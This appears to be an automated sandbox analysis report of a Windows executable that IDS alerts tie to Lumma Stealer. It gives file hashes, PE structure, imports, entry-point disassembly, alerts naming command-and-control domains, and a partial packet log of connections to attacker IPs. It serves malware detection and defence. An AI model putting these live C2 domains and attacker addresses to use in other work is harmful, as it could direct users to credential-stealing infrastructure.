                                                                                                                                                                                                                              SHA-512:0492B2B3191319D8D3BF002E4A83F40A204F94EEE1A00F6F0F17E887E963CE10FB3F84B99DFFA7F15778BBBE697667AF58203845F99C12113C823AC8F0F1142B
                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                              Reputation:low
                                                                                                                                                                                                                              Preview:..<.?.x.m.l. .v.e.r.s.i.o.n.=.".1...0.". .e.n.c.o.d.i.n.g.=.".U.T.F.-.1.6.".?.>.....<.W.E.R.R.e.p.o.r.t.M.e.t.a.d.a.t.a.>.......<.O.S.V.e.r.s.i.o.n.I.n.f.o.r.m.a.t.i.o.n.>.........<.W.i.n.d.o.w.s.N.T.V.e.r.s.i.o.n.>.1.0...0.<./.W.i.n.d.o.w.s.N.T.V.e.r.s.i.o.n.>.........<.B.u.i.l.d.>.1.9.0.4.5.<./.B.u.i.l.d.>.........<.P.r.o.d.u.c.t.>.(.0.x.3.0.).:. .W.i.n.d.o.w.s. .1.0. .P.r.o.<./.P.r.o.d.u.c.t.>.........<.E.d.i.t.i.o.n.>.P.r.o.f.e.s.s.i.o.n.a.l.<./.E.d.i.t.i.o.n.>.........<.B.u.i.l.d.S.t.r.i.n.g.>.1.9.0.4.1...2.0.0.6...a.m.d.6.4.f.r.e...v.b._.r.e.l.e.a.s.e...1.9.1.2.0.6.-.1.4.0.6.<./.B.u.i.l.d.S.t.r.i.n.g.>.........<.R.e.v.i.s.i.o.n.>.2.0.0.6.<./.R.e.v.i.s.i.o.n.>.........<.F.l.a.v.o.r.>.M.u.l.t.i.p.r.o.c.e.s.s.o.r. .F.r.e.e.<./.F.l.a.v.o.r.>.........<.A.r.c.h.i.t.e.c.t.u.r.e.>.X.6.4.<./.A.r.c.h.i.t.e.c.t.u.r.e.>.........<.L.C.I.D.>.2.0.5.7.<./.L.C.I.D.>.......<./.O.S.V.e.r.s.i.o.n.I.n.f.o.r.m.a.t.i.o.n.>.......<.P.r.o.c.e.s.s.I.n.f.o.r.m.a.t.i.o.n.>.........<.P.i.d.>.4.0.5.2.<./.P.i.
                                                                                                                                                                                                                              Process:C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                                                                                              File Type:XML 1.0 document, ASCII text, with CRLF line terminators
                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                              Size (bytes):4714
                                                                                                                                                                                                                              Entropy (8bit):4.474825086865575
                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                              SSDEEP:48:cvIwWl8zsgJg77aI9bAWpW8VYsYm8M4J6FO3F+b+q8v1FOL02Hsd:uIjfmI7l57VMJirKPsNHsd
                                                                                                                                                                                                                              MD5:612AC7C812F30A1A6BF841E47C4361A1
                                                                                                                                                                                                                              SHA1:DB7268012A25779CF2351A24DA48CCA340D01933
                                                                                                                                                                                                                              SHA-256:A8454ABA88A245411C41919FDBF3EFDF7FFDE163F0857E5A131A5AD5621628FD
                                                                                                                                                                                                                              SHA-512:F8A5339ED8B1B5B3ECE676B80F3D4D4FBCB5E73785C61A36B7DF095EF9339E1EF14CF0454C503B3BA07E1A5FE1D28A6B17CED0AEA630BABAC44D5B8C5C93D0C8
                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                              Reputation:low
                                                                                                                                                                                                                              Preview:<?xml version="1.0" encoding="UTF-8" standalone="yes"?>..<req ver="2">.. <tlm>.. <src>.. <desc>.. <mach>.. <os>.. <arg nm="vermaj" val="10" />.. <arg nm="vermin" val="0" />.. <arg nm="verbld" val="19045" />.. <arg nm="vercsdbld" val="2006" />.. <arg nm="verqfe" val="2006" />.. <arg nm="csdbld" val="2006" />.. <arg nm="versp" val="0" />.. <arg nm="arch" val="9" />.. <arg nm="lcid" val="2057" />.. <arg nm="geoid" val="223" />.. <arg nm="sku" val="48" />.. <arg nm="domain" val="0" />.. <arg nm="prodsuite" val="256" />.. <arg nm="ntprodtype" val="1" />.. <arg nm="platid" val="2" />.. <arg nm="tmsi" val="672948" />.. <arg nm="osinsty" val="1" />.. <arg nm="iever" val="11.789.19041.0-11.0.1000" />.. <arg nm="portos" val="0" />.. <arg nm="ram" val="409
                                                                                                                                                                                                                              Process:C:\Users\user\Desktop\lBb4XI4eGD.exe
                                                                                                                                                                                                                              File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                              Size (bytes):403968
                                                                                                                                                                                                                              Entropy (8bit):6.686761413395804
                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                              SSDEEP:3072:Ro2KKJ9Uzzp69NgvCbewaeDZwq0K4gowWix4WlhBTSPY89CA2dPtcDB66Ngv73mt:VJQ6rEGEPipJSPincDcMm28I
                                                                                                                                                                                                                              MD5:08494E6A1E788EA3259955A4524FDFEC
                                                                                                                                                                                                                              SHA1:2C8FA17D05251B515CC52694335A88C7A609E303
                                                                                                                                                                                                                              SHA-256:9EEE9D46E5EA0B25BD904760A998A54550AB3800666D01E27AA8FF52626ECE94
                                                                                                                                                                                                                              SHA-512:A0EAE14B5AA2800F2D4E92E6735A9B3ACF6256C9DFD811DD5E9E16DF20B7DCB7911FA112AE0344A3D3DDF95A4610FBCDC729CD0F9746ED006E277D4E103482FF
                                                                                                                                                                                                                              Malicious:true
                                                                                                                                                                                                                              Antivirus:
                                                                                                                                                                                                                              • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                                                                                                                                                                              • Antivirus: ReversingLabs, Detection: 50%
                                                                                                                                                                                                                              Reputation:low
                                                                                                                                                                                                                              Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$....................................................Rich...........PE..L......f.................6...p...............P....@..........................................................................i..(........i...........................................................................P...............................text....4.......6.................. ..`.rdata..V"...P...$...:..............@..@.data....|...........^..............@....nosu....S.......H...t..............@....muwav..Z....`......................@....roxah.......p......................@..@.rsrc....i.......j..................@..@........................................................................................................................................................................................................................................................
                                                                                                                                                                                                                              Process:C:\Users\user\Desktop\lBb4XI4eGD.exe
                                                                                                                                                                                                                              File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                              Size (bytes):403968
                                                                                                                                                                                                                              Entropy (8bit):6.686761413395804
                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                              SSDEEP:3072:Ro2KKJ9Uzzp69NgvCbewaeDZwq0K4gowWix4WlhBTSPY89CA2dPtcDB66Ngv73mt:VJQ6rEGEPipJSPincDcMm28I
                                                                                                                                                                                                                              MD5:08494E6A1E788EA3259955A4524FDFEC
                                                                                                                                                                                                                              SHA1:2C8FA17D05251B515CC52694335A88C7A609E303
                                                                                                                                                                                                                              SHA-256:9EEE9D46E5EA0B25BD904760A998A54550AB3800666D01E27AA8FF52626ECE94
                                                                                                                                                                                                                              SHA-512:A0EAE14B5AA2800F2D4E92E6735A9B3ACF6256C9DFD811DD5E9E16DF20B7DCB7911FA112AE0344A3D3DDF95A4610FBCDC729CD0F9746ED006E277D4E103482FF
                                                                                                                                                                                                                              Malicious:true
                                                                                                                                                                                                                              Antivirus:
                                                                                                                                                                                                                              • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                                                                                                                                                                              • Antivirus: ReversingLabs, Detection: 50%
                                                                                                                                                                                                                              Reputation:low
                                                                                                                                                                                                                              Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$....................................................Rich...........PE..L......f.................6...p...............P....@..........................................................................i..(........i...........................................................................P...............................text....4.......6.................. ..`.rdata..V"...P...$...:..............@..@.data....|...........^..............@....nosu....S.......H...t..............@....muwav..Z....`......................@....roxah.......p......................@..@.rsrc....i.......j..................@..@........................................................................................................................................................................................................................................................
                                                                                                                                                                                                                              Process:C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                                                                                              File Type:MS Windows registry file, NT/2000 or above
                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                              Size (bytes):1835008
                                                                                                                                                                                                                              Entropy (8bit):4.372046217256679
                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                              SSDEEP:6144:mFVfpi6ceLP/9skLmb0ayWWSPtaJG8nAge35OlMMhA2AX4WABlguNBiL:mV1QyWWI/glMM6kF7Dq
                                                                                                                                                                                                                              MD5:262E74A7144BAAE687546C6CF0CFC67A
                                                                                                                                                                                                                              SHA1:B8647B245F1955F084E7FFFDDE5C612301D34824
                                                                                                                                                                                                                              SHA-256:3EDA7D8D1ECAC28D399631711998D8D49B6AFE3735B1A66BCCC7F5E02379B76B
                                                                                                                                                                                                                              SHA-512:435A61EFBF80D148AEB7F2718DC118CACBDC8A2170B627C0BA869BB1314CB2DDB1D78E8AFA1285DE9E3A319AD19708FAB794659D3DAF1BB622FC605331A0939C
                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                              Reputation:low
                                                                                                                                                                                                                              Preview:regfC...C....\.Z.................... ....0......\.A.p.p.C.o.m.p.a.t.\.P.r.o.g.r.a.m.s.\.A.m.c.a.c.h.e...h.v.e....c...b...#.......c...b...#...........c...b...#......rmtm..(e.e................................................................................................................................................................................................................................................................................................................................................?Q........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                                                                                                                              File type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                                                                                                                                              Entropy (8bit):6.9413953277611835
                                                                                                                                                                                                                              TrID:
                                                                                                                                                                                                                              • Win32 Executable (generic) a (10002005/4) 99.96%
                                                                                                                                                                                                                              • Generic Win/DOS Executable (2004/3) 0.02%
                                                                                                                                                                                                                              • DOS Executable Generic (2002/1) 0.02%
                                                                                                                                                                                                                              • Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
                                                                                                                                                                                                                              File name:lBb4XI4eGD.exe
                                                                                                                                                                                                                              File size:458'240 bytes
                                                                                                                                                                                                                              MD5:4c9a8f87a919e9fccd2476b3689d05de
                                                                                                                                                                                                                              SHA1:3351e4e7a0f54f5beacad77d1f5de210fb97e70a
                                                                                                                                                                                                                              SHA256:77d5024e1e13eb0c8fd9119ab314bf283252232465f2e995372a844a8e7b4a97
                                                                                                                                                                                                                              SHA512:539126b9e64fba0e27339c928e8796eb49da39fffaba69147ac24a348c568484d9bf24d40659d0fa2bcfff22d3073ab5615b6e0d8d182378fc44f8c2a16efe84
                                                                                                                                                                                                                              SSDEEP:6144:xGRwylT4R1gKYBEZJWEY9G09VB7xLbuvTKgISGmtXXPWrpW9I8Bd0H6d:xwwyluHHrWE109H7luvTKxGBWW/0H6
                                                                                                                                                                                                                              TLSH:22A4CF12A6FCF9D1F7B74A31EE3E86E86A6FF4224E64624D31146B1F09743A1C562703
                                                                                                                                                                                                                              File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......................................................................................Rich............PE..L...._.d...................
                                                                                                                                                                                                                              Icon Hash:86c7c30b0f4e0d19
                                                                                                                                                                                                                              Entrypoint:0x4014b7
                                                                                                                                                                                                                              Entrypoint Section:.text
                                                                                                                                                                                                                              Digitally signed:false
                                                                                                                                                                                                                              Imagebase:0x400000
                                                                                                                                                                                                                              Subsystem:windows gui
                                                                                                                                                                                                                              Image File Characteristics:RELOCS_STRIPPED, EXECUTABLE_IMAGE, 32BIT_MACHINE
                                                                                                                                                                                                                              DLL Characteristics:TERMINAL_SERVER_AWARE
                                                                                                                                                                                                                              Time Stamp:0x64E25FD3 [Sun Aug 20 18:47:47 2023 UTC]
                                                                                                                                                                                                                              TLS Callbacks:
                                                                                                                                                                                                                              CLR (.Net) Version:
                                                                                                                                                                                                                              OS Version Major:5
                                                                                                                                                                                                                              OS Version Minor:0
                                                                                                                                                                                                                              File Version Major:5
                                                                                                                                                                                                                              File Version Minor:0
                                                                                                                                                                                                                              Subsystem Version Major:5
                                                                                                                                                                                                                              Subsystem Version Minor:0
                                                                                                                                                                                                                              Import Hash:ed8c9aab5b430953fb9c6d93394d74ac
                                                                                                                                                                                                                              Instruction
                                                                                                                                                                                                                              call 00007F0DF093B8B4h
                                                                                                                                                                                                                              jmp 00007F0DF09380ADh
                                                                                                                                                                                                                              mov edi, edi
                                                                                                                                                                                                                              push ebp
                                                                                                                                                                                                                              mov ebp, esp
                                                                                                                                                                                                                              sub esp, 00000328h
                                                                                                                                                                                                                              mov dword ptr [00456598h], eax
                                                                                                                                                                                                                              mov dword ptr [00456594h], ecx
                                                                                                                                                                                                                              mov dword ptr [00456590h], edx
                                                                                                                                                                                                                              mov dword ptr [0045658Ch], ebx
                                                                                                                                                                                                                              mov dword ptr [00456588h], esi
                                                                                                                                                                                                                              mov dword ptr [00456584h], edi
                                                                                                                                                                                                                              mov word ptr [004565B0h], ss
                                                                                                                                                                                                                              mov word ptr [004565A4h], cs
                                                                                                                                                                                                                              mov word ptr [00456580h], ds
                                                                                                                                                                                                                              mov word ptr [0045657Ch], es
                                                                                                                                                                                                                              mov word ptr [00456578h], fs
                                                                                                                                                                                                                              mov word ptr [00456574h], gs
                                                                                                                                                                                                                              pushfd
                                                                                                                                                                                                                              pop dword ptr [004565A8h]
                                                                                                                                                                                                                              mov eax, dword ptr [ebp+00h]
                                                                                                                                                                                                                              mov dword ptr [0045659Ch], eax
                                                                                                                                                                                                                              mov eax, dword ptr [ebp+04h]
                                                                                                                                                                                                                              mov dword ptr [004565A0h], eax
                                                                                                                                                                                                                              lea eax, dword ptr [ebp+08h]
                                                                                                                                                                                                                              mov dword ptr [004565ACh], eax
                                                                                                                                                                                                                              mov eax, dword ptr [ebp-00000320h]
                                                                                                                                                                                                                              mov dword ptr [004564E8h], 00010001h
                                                                                                                                                                                                                              mov eax, dword ptr [004565A0h]
                                                                                                                                                                                                                              mov dword ptr [0045649Ch], eax
                                                                                                                                                                                                                              mov dword ptr [00456490h], C0000409h
                                                                                                                                                                                                                              mov dword ptr [00456494h], 00000001h
                                                                                                                                                                                                                              mov eax, dword ptr [00455004h]
                                                                                                                                                                                                                              mov dword ptr [ebp-00000328h], eax
                                                                                                                                                                                                                              mov eax, dword ptr [00455008h]
                                                                                                                                                                                                                              mov dword ptr [ebp-00000324h], eax
                                                                                                                                                                                                                              call dword ptr [000000A0h]
                                                                                                                                                                                                                              Programming Language:
                                                                                                                                                                                                                              • [C++] VS2008 build 21022
                                                                                                                                                                                                                              • [ASM] VS2008 build 21022
                                                                                                                                                                                                                              • [ C ] VS2008 build 21022
                                                                                                                                                                                                                              • [IMP] VS2005 build 50727
                                                                                                                                                                                                                              • [RES] VS2008 build 21022
                                                                                                                                                                                                                              • [LNK] VS2008 build 21022
                                                                                                                                                                                                                              NameVirtual AddressVirtual Size Is in Section
                                                                                                                                                                                                                              IMAGE_DIRECTORY_ENTRY_EXPORT0x00x0
                                                                                                                                                                                                                              IMAGE_DIRECTORY_ENTRY_IMPORT0x539ec0x28.rdata
                                                                                                                                                                                                                              IMAGE_DIRECTORY_ENTRY_RESOURCE0xc50000x16fd0.rsrc
                                                                                                                                                                                                                              IMAGE_DIRECTORY_ENTRY_EXCEPTION0x00x0
                                                                                                                                                                                                                              IMAGE_DIRECTORY_ENTRY_SECURITY0x00x0
                                                                                                                                                                                                                              IMAGE_DIRECTORY_ENTRY_BASERELOC0x00x0
                                                                                                                                                                                                                              IMAGE_DIRECTORY_ENTRY_DEBUG0x00x0
                                                                                                                                                                                                                              IMAGE_DIRECTORY_ENTRY_COPYRIGHT0x00x0
                                                                                                                                                                                                                              IMAGE_DIRECTORY_ENTRY_GLOBALPTR0x00x0
                                                                                                                                                                                                                              IMAGE_DIRECTORY_ENTRY_TLS0x00x0
                                                                                                                                                                                                                              IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG0x535680x40.rdata
                                                                                                                                                                                                                              IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT0x00x0
                                                                                                                                                                                                                              IMAGE_DIRECTORY_ENTRY_IAT0x520000x180.rdata
                                                                                                                                                                                                                              IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT0x00x0
                                                                                                                                                                                                                              IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR0x00x0
                                                                                                                                                                                                                              IMAGE_DIRECTORY_ENTRY_RESERVED0x00x0
                                                                                                                                                                                                                              NameVirtual AddressVirtual SizeRaw SizeMD5Xored PEZLIB ComplexityFile TypeEntropyCharacteristics
                                                                                                                                                                                                                              .text0x10000x5030c0x50400c7b9a236908210a86880c6cbd88b8feaFalse0.8436982817367601data7.5444950111318025IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                                                                                                                                                                                                                              .rdata0x520000x22760x2400fc385092d642228464a7cc5b1cd499a9False0.3567708333333333OpenPGP Secret Key Version 55.414047856437413IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                                                                                                                                                                                                              .data0x550000x67c080x16000323863f656fc5f9883c99c0788c37f7False0.2879971590909091data2.910130810804819IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                                                                                                                                                                                                              .tijani0xbd0000x53e50x4800f9debe3f07be68533bf0295e3d2ba68aFalse0.002224392361111111data0.0IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                                                                                                                                                                                                              .kafej0xc30000x15a0x200bf619eac0cdf3f68d496ea9344137e8bFalse0.02734375data0.0IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                                                                                                                                                                                                              .fat0xc40000xc0x200bf619eac0cdf3f68d496ea9344137e8bFalse0.02734375data0.0IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                                                                                                                                                                                                              .rsrc0xc50000x16fd00x17000b4e29dba068560d7194d0c76e7f4b101False0.4603324558423913data5.159445388228772IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                                                                                                                                                                                                              NameRVASizeTypeLanguageCountryZLIB Complexity
                                                                                                                                                                                                                              RT_CURSOR0xd5b580x130Device independent bitmap graphic, 32 x 64 x 1, image size 00.4276315789473684
                                                                                                                                                                                                                              RT_CURSOR0xd5ca00xea8Device independent bitmap graphic, 48 x 96 x 8, image size 00.31023454157782515
                                                                                                                                                                                                                              RT_ICON0xc59000xea8Device independent bitmap graphic, 48 x 96 x 8, image size 2304, 256 important colors0.8097014925373134
                                                                                                                                                                                                                              RT_ICON0xc67a80x8a8Device independent bitmap graphic, 32 x 64 x 8, image size 1024, 256 important colors0.8546931407942239
                                                                                                                                                                                                                              RT_ICON0xc70500x6c8Device independent bitmap graphic, 24 x 48 x 8, image size 576, 256 important colors0.8006912442396313
                                                                                                                                                                                                                              RT_ICON0xc77180x568Device independent bitmap graphic, 16 x 32 x 8, image size 256, 256 important colors0.7955202312138728
                                                                                                                                                                                                                              RT_ICON0xc7c800x25a8Device independent bitmap graphic, 48 x 96 x 32, image size 92160.8069502074688797
                                                                                                                                                                                                                              RT_ICON0xca2280x988Device independent bitmap graphic, 24 x 48 x 32, image size 23040.8422131147540983
                                                                                                                                                                                                                              RT_ICON0xcabb00x468Device independent bitmap graphic, 16 x 32 x 32, image size 10240.8617021276595744
                                                                                                                                                                                                                              RT_ICON0xcb0800xea8Device independent bitmap graphic, 48 x 96 x 8, image size 00.3243603411513859
                                                                                                                                                                                                                              RT_ICON0xcbf280x8a8Device independent bitmap graphic, 32 x 64 x 8, image size 00.44765342960288806
                                                                                                                                                                                                                              RT_ICON0xcc7d00x6c8Device independent bitmap graphic, 24 x 48 x 8, image size 00.5190092165898618
                                                                                                                                                                                                                              RT_ICON0xcce980x568Device independent bitmap graphic, 16 x 32 x 8, image size 00.536849710982659
                                                                                                                                                                                                                              RT_ICON0xcd4000x10a8Device independent bitmap graphic, 32 x 64 x 32, image size 00.28822701688555347
                                                                                                                                                                                                                              RT_ICON0xce4a80x988Device independent bitmap graphic, 24 x 48 x 32, image size 00.289344262295082
                                                                                                                                                                                                                              RT_ICON0xcee300x468Device independent bitmap graphic, 16 x 32 x 32, image size 00.34131205673758863
                                                                                                                                                                                                                              RT_ICON0xcf3000xea8Device independent bitmap graphic, 48 x 96 x 8, image size 00.2785181236673774
                                                                                                                                                                                                                              RT_ICON0xd01a80x8a8Device independent bitmap graphic, 32 x 64 x 8, image size 00.36462093862815886
                                                                                                                                                                                                                              RT_ICON0xd0a500x6c8Device independent bitmap graphic, 24 x 48 x 8, image size 00.3790322580645161
                                                                                                                                                                                                                              RT_ICON0xd11180x568Device independent bitmap graphic, 16 x 32 x 8, image size 00.36921965317919075
                                                                                                                                                                                                                              RT_ICON0xd16800x25a8Device independent bitmap graphic, 48 x 96 x 32, image size 00.2590248962655602
                                                                                                                                                                                                                              RT_ICON0xd3c280x10a8Device independent bitmap graphic, 32 x 64 x 32, image size 00.274624765478424
                                                                                                                                                                                                                              RT_ICON0xd4cd00x988Device independent bitmap graphic, 24 x 48 x 32, image size 00.28647540983606556
                                                                                                                                                                                                                              RT_ICON0xd56580x468Device independent bitmap graphic, 16 x 32 x 32, image size 00.3262411347517731
                                                                                                                                                                                                                              RT_STRING0xd6d180x59adata0.4309623430962343
                                                                                                                                                                                                                              RT_STRING0xd72b80xfcdata0.5515873015873016
                                                                                                                                                                                                                              RT_STRING0xd73b80x788data0.42012448132780084
                                                                                                                                                                                                                              RT_STRING0xd7b400x784data0.4287941787941788
                                                                                                                                                                                                                              RT_STRING0xd82c80x726data0.42568306010928963
                                                                                                                                                                                                                              RT_STRING0xd89f00x644data0.4389027431421446
                                                                                                                                                                                                                              RT_STRING0xd90380x6bcdata0.4274941995359629
                                                                                                                                                                                                                              RT_STRING0xd96f80x7f2data0.41297935103244837
                                                                                                                                                                                                                              RT_STRING0xd9ef00x786data0.4221183800623053
                                                                                                                                                                                                                              RT_STRING0xda6780x5cedata0.43943472409152085
                                                                                                                                                                                                                              RT_STRING0xdac480x554data0.45234604105571846
                                                                                                                                                                                                                              RT_STRING0xdb1a00x60cdata0.4412144702842377
                                                                                                                                                                                                                              RT_STRING0xdb7b00x81cdata0.41570327552986513
                                                                                                                                                                                                                              RT_ACCELERATOR0xd5b380x20data1.15625
                                                                                                                                                                                                                              RT_GROUP_CURSOR0xd5c880x14data1.15
                                                                                                                                                                                                                              RT_GROUP_CURSOR0xd6b480x14data1.25
                                                                                                                                                                                                                              RT_GROUP_ICON0xcb0180x68data0.7115384615384616
                                                                                                                                                                                                                              RT_GROUP_ICON0xd5ac00x76data0.6779661016949152
                                                                                                                                                                                                                              RT_GROUP_ICON0xcf2980x68data0.7115384615384616
                                                                                                                                                                                                                              RT_VERSION0xd6b600x1b4data0.5825688073394495
                                                                                                                                                                                                                              DLLImport
                                                                                                                                                                                                                              KERNEL32.dllSetThreadContext, DebugActiveProcessStop, CreateProcessW, SetWaitableTimer, GetConsoleAliasA, InterlockedDecrement, SetDefaultCommConfigW, GetEnvironmentStringsW, SetComputerNameW, GetProcessPriorityBoost, GetModuleHandleW, GetCurrentThread, SetFileTime, GetEnvironmentStrings, LoadLibraryW, GetVersionExW, GetTimeFormatW, GetAtomNameW, GetVolumePathNameA, GetStartupInfoW, GetStartupInfoA, SetLastError, GetProcAddress, GetLongPathNameA, SearchPathA, LoadLibraryA, InterlockedExchangeAdd, LocalAlloc, MoveFileA, AddAtomA, FoldStringA, OpenFileMappingW, FindFirstVolumeA, FindAtomW, DeleteTimerQueueTimer, GetCommandLineA, TerminateProcess, GetCurrentProcess, UnhandledExceptionFilter, SetUnhandledExceptionFilter, IsDebuggerPresent, HeapAlloc, GetLastError, WriteFile, WideCharToMultiByte, GetConsoleCP, GetConsoleMode, FlushFileBuffers, DeleteCriticalSection, LeaveCriticalSection, EnterCriticalSection, Sleep, ExitProcess, GetStdHandle, GetModuleFileNameA, FreeEnvironmentStringsA, FreeEnvironmentStringsW, SetHandleCount, GetFileType, TlsGetValue, TlsAlloc, TlsSetValue, TlsFree, InterlockedIncrement, GetCurrentThreadId, HeapCreate, VirtualFree, HeapFree, QueryPerformanceCounter, GetTickCount, GetCurrentProcessId, GetSystemTimeAsFileTime, VirtualAlloc, HeapReAlloc, WriteConsoleA, GetConsoleOutputCP, WriteConsoleW, MultiByteToWideChar, SetFilePointer, SetStdHandle, InitializeCriticalSectionAndSpinCount, RtlUnwind, GetCPInfo, GetACP, GetOEMCP, IsValidCodePage, CreateFileA, CloseHandle, LCMapStringA, LCMapStringW, GetStringTypeA, GetStringTypeW, GetLocaleInfoA, HeapSize, GetModuleHandleA
                                                                                                                                                                                                                              TimestampSIDSignatureSeveritySource IPSource PortDest IPDest PortProtocol
                                                                                                                                                                                                                              2025-01-12T17:45:27.263264+01002803274ETPRO MALWARE Common Downloader Header Pattern UH2192.168.2.849707172.67.179.207443TCP
                                                                                                                                                                                                                              2025-01-12T17:45:28.090254+01002803274ETPRO MALWARE Common Downloader Header Pattern UH2192.168.2.849708176.113.115.1980TCP
                                                                                                                                                                                                                              2025-01-12T17:45:31.108090+01002059088ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (skidjazzyric .click)1192.168.2.8596781.1.1.153UDP
                                                                                                                                                                                                                              2025-01-12T17:45:31.124282+01002059051ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (soundtappysk .shop)1192.168.2.8592461.1.1.153UDP
                                                                                                                                                                                                                              2025-01-12T17:45:31.137039+01002059041ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (femalsabler .shop)1192.168.2.8574751.1.1.153UDP
                                                                                                                                                                                                                              2025-01-12T17:45:31.223941+01002059035ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (apporholis .shop)1192.168.2.8606831.1.1.153UDP
                                                                                                                                                                                                                              2025-01-12T17:45:31.236473+01002059039ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (crowdwarek .shop)1192.168.2.8495471.1.1.153UDP
                                                                                                                                                                                                                              2025-01-12T17:45:31.246922+01002059057ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (versersleep .shop)1192.168.2.8568721.1.1.153UDP
                                                                                                                                                                                                                              2025-01-12T17:45:31.332886+01002059037ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (chipdonkeruz .shop)1192.168.2.8588131.1.1.153UDP
                                                                                                                                                                                                                              2025-01-12T17:45:31.345372+01002059043ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (handscreamny .shop)1192.168.2.8604701.1.1.153UDP
                                                                                                                                                                                                                              2025-01-12T17:45:31.357464+01002059049ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (robinsharez .shop)1192.168.2.8593881.1.1.153UDP
                                                                                                                                                                                                                              2025-01-12T17:45:32.028869+01002028371ET JA3 Hash - Possible Malware - Fake Firefox Font Update3192.168.2.849709104.102.49.254443TCP
                                                                                                                                                                                                                              2025-01-12T17:45:32.515158+01002858666ETPRO MALWARE Win32/Lumma Stealer Steam Profile Lookup1192.168.2.849709104.102.49.254443TCP
                                                                                                                                                                                                                              TimestampSource PortDest PortSource IPDest IP
                                                                                                                                                                                                                              Jan 12, 2025 17:45:26.401979923 CET49707443192.168.2.8172.67.179.207
                                                                                                                                                                                                                              Jan 12, 2025 17:45:26.402029991 CET44349707172.67.179.207192.168.2.8
                                                                                                                                                                                                                              Jan 12, 2025 17:45:26.402128935 CET49707443192.168.2.8172.67.179.207
                                                                                                                                                                                                                              Jan 12, 2025 17:45:26.413696051 CET49707443192.168.2.8172.67.179.207
                                                                                                                                                                                                                              Jan 12, 2025 17:45:26.413717031 CET44349707172.67.179.207192.168.2.8
                                                                                                                                                                                                                              Jan 12, 2025 17:45:26.897157907 CET44349707172.67.179.207192.168.2.8
                                                                                                                                                                                                                              Jan 12, 2025 17:45:26.897277117 CET49707443192.168.2.8172.67.179.207
                                                                                                                                                                                                                              Jan 12, 2025 17:45:26.950575113 CET49707443192.168.2.8172.67.179.207
                                                                                                                                                                                                                              Jan 12, 2025 17:45:26.950609922 CET44349707172.67.179.207192.168.2.8
                                                                                                                                                                                                                              Jan 12, 2025 17:45:26.950993061 CET44349707172.67.179.207192.168.2.8
                                                                                                                                                                                                                              Jan 12, 2025 17:45:26.951108932 CET49707443192.168.2.8172.67.179.207
                                                                                                                                                                                                                              Jan 12, 2025 17:45:26.954828978 CET49707443192.168.2.8172.67.179.207
                                                                                                                                                                                                                              Jan 12, 2025 17:45:26.995342970 CET44349707172.67.179.207192.168.2.8
                                                                                                                                                                                                                              Jan 12, 2025 17:45:27.263284922 CET44349707172.67.179.207192.168.2.8
                                                                                                                                                                                                                              Jan 12, 2025 17:45:27.263369083 CET49707443192.168.2.8172.67.179.207
                                                                                                                                                                                                                              Jan 12, 2025 17:45:27.263401985 CET44349707172.67.179.207192.168.2.8
                                                                                                                                                                                                                              Jan 12, 2025 17:45:27.263411999 CET44349707172.67.179.207192.168.2.8
                                                                                                                                                                                                                              Jan 12, 2025 17:45:27.263456106 CET49707443192.168.2.8172.67.179.207
                                                                                                                                                                                                                              Jan 12, 2025 17:45:27.265325069 CET49707443192.168.2.8172.67.179.207
                                                                                                                                                                                                                              Jan 12, 2025 17:45:27.265340090 CET44349707172.67.179.207192.168.2.8
                                                                                                                                                                                                                              Jan 12, 2025 17:45:27.265352964 CET49707443192.168.2.8172.67.179.207
                                                                                                                                                                                                                              Jan 12, 2025 17:45:27.265391111 CET49707443192.168.2.8172.67.179.207
                                                                                                                                                                                                                              Jan 12, 2025 17:45:27.401766062 CET4970880192.168.2.8176.113.115.19
